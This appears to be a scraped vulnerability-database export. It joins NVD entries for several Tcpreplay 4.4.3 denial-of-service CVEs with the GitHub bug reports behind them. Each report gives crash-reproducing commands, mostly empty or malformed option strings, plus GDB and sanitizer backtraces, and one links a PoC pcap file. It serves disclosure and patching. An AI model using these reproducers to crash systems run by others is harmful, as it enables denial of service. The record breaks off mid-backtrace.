An issue found in TCPReplay v.4.4.3 allows a remote attacker to cause a denial of service via the read_hexstring function at the utils.c:309 endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/787" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/787" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/appneta/tcpreplay/issues/787
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a NULL Pointer Dereference in `read_hexstring()` when the user passes empty user dlink string to `tcprewrite` with option `--user-dlink` when the program process the pcap file whose data link type is DLT_USER0. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcprewrite --user-dlink="" -i $POC -o /dev/null` The POC file could be downloaded in [POC file](https://raw.githubusercontent.com/Marsman1996/pocs/master/tcpreplay/poc-tcprewrite-bcb107a-read_hexstring-SEGV) **Expected behavior** Program crashes with Segmentation fault. The GDB report is: ``` $ gdb --args ./bin_normal/bin/tcprewrite --user-dlink="" -i ./poc-tcprewrite-bcb107a-read_hexstring-SEGV -o /dev/null (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --user-dlink= -i ./poc-tcprewrite-bcb107a-read_hexstring-SEGV -o /dev/null Program received signal SIGSEGV, Segmentation fault. __rawmemchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:65 65 ../sysdeps/x86_64/multiarch/memchr-avx2.S: No such file or directory. (gdb) bt #0 __rawmemchr_avx2 () at ../sysdeps/x86_64/multiarch/memchr-avx2.S:65 #1 0x00007ffff7dddf36 in _IO_str_init_static_internal (sf=sf@entry=0x7fffffffbe30, ptr=ptr@entry=0x0, size=size@entry=0, pstart=pstart@entry=0x0) at strops.c:41 #2 0x00007ffff7dad4c3 in _IO_strfile_read (string=0x0, sf=0x7fffffffbe30) at ../libio/strfile.h:95 #3 __GI___isoc99_sscanf (s=0x0, format=0x555555576598 "%x") at isoc99_sscanf.c:28 #4 0x000055555556e7cf in read_hexstring (l2string=0x55555557e2a0 "", hex=0x555555581367 "", hexlen=255) at utils.c:309 #5 0x00005555555656ae in dlt_user_parse_opts (ctx=0x555555580890) at plugins/dlt_user/user.c:194 #6 0x000055555556169c in tcpedit_dlt_parse_opts (ctx=0x555555580890) at plugins/dlt_utils.c:39 #7 0x0000555555560ca5 in tcpedit_dlt_post_args (tcpedit=0x55555557ffe0) at plugins/dlt_plugins.c:210 #8 0x000055555555b575 in tcpedit_post_args (tcpedit=0x55555557ffe0) at parse_args.c:252 #9 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2e8) at tcprewrite.c:89 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] NULL Pointer Dereference in read_hexstring() at utils.c:309
https://api.github.com/repos/appneta/tcpreplay/issues/787/comments
1
2023-03-01T14:29:21Z
2023-06-05T02:12:40Z
https://github.com/appneta/tcpreplay/issues/787
1,605,081,875
787
4,855
CVE-2023-27785
2023-03-16T15:15:10.823
An issue found in TCPreplay TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse endpoints function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/785" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/785" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/appneta/tcpreplay/issues/785
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a NULL Pointer Dereference in `parse_endpoints()` when the user passes empty endpoints string to `tcprewrite` with option `--endpoints`. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Generate cache file `$ ./tcpprep --port --pcap=./test.pcap --cachefile=./test.cache` The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`. 3. Run Command `$ ./tcprewrite --endpoints="" -i ./test.pcap -o /dev/null --cachefile=./test.cache` **Expected behavior** Program crashes with Segmentation fault. The GDB report is: ``` $ gdb --args ./bin_normal/bin/tcprewrite --endpoints="" -i ./code/test/test.pcap -o /dev/null --cachefile=./test.cache For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./bin_normal/bin/tcprewrite... (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --endpoints= -i ./code/test/test.pcap -o /dev/null --cachefile=./test.cache Program received signal SIGSEGV, Segmentation fault. 0x000055555556fde2 in strlcat (dst=0x7fffffffc0aa "", src=0x0, dsize=92) at strlcat.c:45 45 while (*src != '\0') { (gdb) bt #0 0x000055555556fde2 in strlcat (dst=0x7fffffffc0aa "", src=0x0, dsize=92) at strlcat.c:45 #1 0x000055555556b6f0 in parse_endpoints (cidrmap1=0x555555580850, cidrmap2=0x555555580858, optarg=0x7fffffffc654 "") at cidr.c:367 #2 0x000055555555b51c in tcpedit_post_args (tcpedit=0x55555557fff0) at parse_args.c:243 #3 0x0000555555558c23 in main (argc=0, argv=0x7fffffffc2f0) at tcprewrite.c:89 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] NULL Pointer Dereference in parse_endpoints() at cidr.c:367
https://api.github.com/repos/appneta/tcpreplay/issues/785/comments
1
2023-03-01T13:05:12Z
2023-06-05T02:11:48Z
https://github.com/appneta/tcpreplay/issues/785
1,604,942,692
785
4,856
CVE-2023-27786
2023-03-16T15:15:10.877
An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the macinstring function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/782" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/783" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/pull/783" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/appneta/tcpreplay/issues/782
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a NULL Pointer Dereference in `macinstring()` when the user passes empty mac string to `tcpprep` in Source MAC split mode. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcpprep -e "" --pcap=./test.pcap --cachefile=/dev/null` The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`. **Expected behavior** Program crashes with Segmentation fault. The GDB report: ``` $ gdb --args ./bin_normal/bin/tcpprep -e "" --pcap=./code/test/test.pcap --cachefile=/dev/null (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep -e '' --pcap=./code/test/test.pcap --cachefile=/dev/null Program received signal SIGSEGV, Segmentation fault. 0x0000555555562b50 in macinstring (macstring=0x55555558dbf0 "", mac=0x55555558f0e6 "\370\036\337\345\204:\b") at mac.c:120 120 if (strlen(tempstr)) { (gdb) bt #0 0x0000555555562b50 in macinstring (macstring=0x55555558dbf0 "", mac=0x55555558f0e6 "\370\036\337\345\204:\b") at mac.c:120 #1 0x00005555555596b6 in process_raw_packets (pcap=0x55555558ee40) at tcpprep.c:450 #2 0x0000555555558d23 in main (argc=5, argv=0x7fffffffc2d8) at tcpprep.c:144 ``` The ASAN report: ``` $ ./bin_asan/bin/tcpprep -e "" --pcap=./code/test/test.pcap --cachefile=/dev/null AddressSanitizer:DEADLYSIGNAL ================================================================= ==3017398==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000516fd4 bp 0x7ffe41169c70 sp 0x7ffe41169b80 T0) ==3017398==The signal is caused by a READ memory access. ==3017398==Hint: address points to the zero page. #0 0x516fd4 in macinstring /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/common/../../../code/src/common/mac.c:120:9 #1 0x4fe345 in process_raw_packets /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/../../code/src/tcpprep.c:450:25 #2 0x4fe345 in main /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/../../code/src/tcpprep.c:144:23 #3 0x7fb921f310b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41f4ed in _start (/home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_asan/bin/tcpprep+0x41f4ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu178/cvelibf/test/tcpreplay/latest/build_asan/src/common/../../../code/src/common/mac.c:120:9 in macinstring ==3017398==ABORTING ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] NULL Pointer Dereference in macinstring() at mac.c:120
https://api.github.com/repos/appneta/tcpreplay/issues/782/comments
2
2023-03-01T08:19:59Z
2023-06-05T02:10:12Z
https://github.com/appneta/tcpreplay/issues/782
1,604,494,155
782
4,857
CVE-2023-27787
2023-03-16T15:15:10.940
An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse_list function at the list.c:81 endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/788" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/788" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/appneta/tcpreplay/issues/788
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a NULL Pointer Dereference in `parse_list()` when the user passes specific size (i.e., 2) of include string to `tcpprep` with option `--include`. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcpprep --include="P "` **Expected behavior** Program crashes with Segmentation fault. ``` $ gdb --args ./bin_normal/bin/tcpprep --include="P " (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcpprep --include=P\ Program received signal SIGSEGV, Segmentation fault. __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory. (gdb) bt #0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x00007ffff7e4982b in __GI___regexec (preg=0x7fffffffd650, string=0x0, nmatch=0, pmatch=0x0, eflags=0) at regexec.c:210 #2 0x000055555555ed19 in parse_list (listdata=0x55555556db38, ourstr=0x55555558dbf2 "") at list.c:81 #3 0x00005555555614a7 in parse_xX_str (xX=0x55555556db30, str=0x55555558dbf2 "", bpf=0x55555556db50) at xX.c:84 #4 0x00005555555581fc in doOptInclude (pOptions=0x55555556bc00 <tcpprepOptions>, pOptDesc=0x55555556b3c8 <optDesc+936>) at tcpprep_opts.c:1411 #5 0x00007ffff7f4011e in ?? () from /lib/x86_64-linux-gnu/libopts.so.25 #6 0x00007ffff7f48964 in ?? () from /lib/x86_64-linux-gnu/libopts.so.25 #7 0x00007ffff7f4b7c8 in optionProcess () from /lib/x86_64-linux-gnu/libopts.so.25 #8 0x000055555555899c in main (argc=2, argv=0x7fffffffde88) at tcpprep.c:89 ``` **System (please complete the following information):** - OS: Ubuntu - OS version: 20.04, 64 bit - Tcpreplay Version: master bcb107a ``` $ ./bin_normal/bin/tcprewrite -V tcprewrite version: 4.4.3 (build git:v4.4.3) Copyright 2013-2022 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net> The entire Tcpreplay Suite is licensed under the GPLv3 Cache file supported: 04 Not compiled with libdnet. Compiled against libpcap: 1.9.1 64 bit packet counters: enabled Verbose printing via tcpdump: enabled Fragroute engine: disabled ```
[Bug] NULL Pointer Dereference in parse_list() at list.c:81
https://api.github.com/repos/appneta/tcpreplay/issues/788/comments
1
2023-03-02T01:58:00Z
2023-06-05T02:13:05Z
https://github.com/appneta/tcpreplay/issues/788
1,605,978,257
788
4,858
CVE-2023-27788
2023-03-16T15:15:11.000
An issue found in TCPrewrite v.4.4.3 allows a remote attacker to cause a denial of service via the ports2PORT function at the portmap.c:69 endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/786" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/appneta/tcpreplay/issues/786" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R3ER3YTFR3XIDMYEB7LMFWFTPVQALBHC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE3J4LKYFNKPKNSLDQK4JG36THQMQH3V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UK2BRH3W3ECF5FDXP6QM3ZEDTHIOE4M5/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/appneta/tcpreplay/issues/786
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** There is a reachable assertion in `ports2PORT()` when the user passes empty portmap string to `tcprewrite` with option `--portmap`. **To Reproduce** Steps to reproduce the behavior: 1. Get the Tcpreplay source code and compile it. ``` $ ./configure $ make ``` 2. Run Command `$ ./tcprewrite --portmap="" -i ./test.pcap -o /dev/null` The file `test.pcap` is from tcpreplay codebase, which is located in `test/test.pcap`. **Expected behavior** Program reports assertion failure and is terminated. The GDB report: ``` $ gdb --args ./bin_normal/bin/tcprewrite --portmap="" -i ./code/test/test.pcap -o /dev/null (gdb) r Starting program: /home/ubuntu178/cvelibf/test/tcpreplay/latest/bin_normal/bin/tcprewrite --portmap= -i ./code/test/test.pcap -o /dev/null tcprewrite: portmap.c:69: ports2PORT: Assertion `ports' failed. Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7d6d859 in 